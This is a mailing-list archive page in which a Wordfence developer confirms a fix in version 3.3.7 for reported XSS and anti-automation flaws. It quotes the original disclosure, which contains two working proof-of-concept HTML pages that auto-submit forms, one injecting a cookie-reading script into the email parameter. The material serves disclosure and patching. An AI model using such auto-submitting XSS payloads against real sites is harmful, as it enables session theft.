[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress

To: MustLive <mustlive@xxxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
From: Mark Maunder <mmaunder@xxxxxxxxx>
Date: Fri, 19 Oct 2012 20:09:20 +0200

This has been fixed and the release just went out. Version 3.3.7.

The email param is now escaped and we've added rate limiting to the form
with a 3 minute backoff if the limit is exceeded.

http://wordpress.org/extend/plugins/wordfence/changelog/

Thanks for your report.

Regards,

Mark Maunder.



On Fri, Oct 19, 2012 at 7:16 PM, MustLive <mustlive@xxxxxxxxxxxxxxxxxx>wrote:

> Hello list!
>
> I want to warn you about Cross-Site Scripting and Insufficient
> Anti-automation vulnerabilities in Wordfence Security for WordPress.
>
> Wordfence - it's security plugin for WordPress.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are Wordfence Security 3.3.5 and previous versions.
>
> ----------
> Details:
> ----------
>
> XSS (WASC-08):
>
> Wordfence Security XSS.html
>
> <html>
> <head>
> <title>Wordfence Security XSS exploit (C) 2012 MustLive.
> http://websecurity.com.ua</title>
> </head>
> <body onLoad="document.hack.submit()">
> <form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post">
> <input type="hidden" name="email"
> value="<script>alert(document.cookie)</script>">
> </form>
> </body>
> </html>
>
> Insufficient Anti-automation (WASC-21):
>
> Wordfence Security IAA.html
>
> <html>
> <head>
> <title>Wordfence Security IAA exploit (C) 2012 MustLive.
> http://websecurity.com.ua</title>
> </head>
> <body onLoad="document.hack.submit()">
> <form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post">
> <input type="hidden" name="email" value="admin@xxxxxxxxxx">
> </form>
> </body>
> </html>
>
> I've informed the plugin developer about vulnerabilities. And mentioned
> about these vulnerabilities at my site (http://websecurity.com.ua/6106/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
Mark Maunder <mmaunder@xxxxxxxxx>
France: (+33) 068-700-8029

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
  - From: MustLive

References:
- [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
  - From: MustLive

Prev by Date: Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
Next by Date: Re: [Full-disclosure] Google Maps pseudonym disclosure vulnerability via Google Places reviews
Previous by thread: Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
Next by thread: Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
Index(es):
- Date
- Thread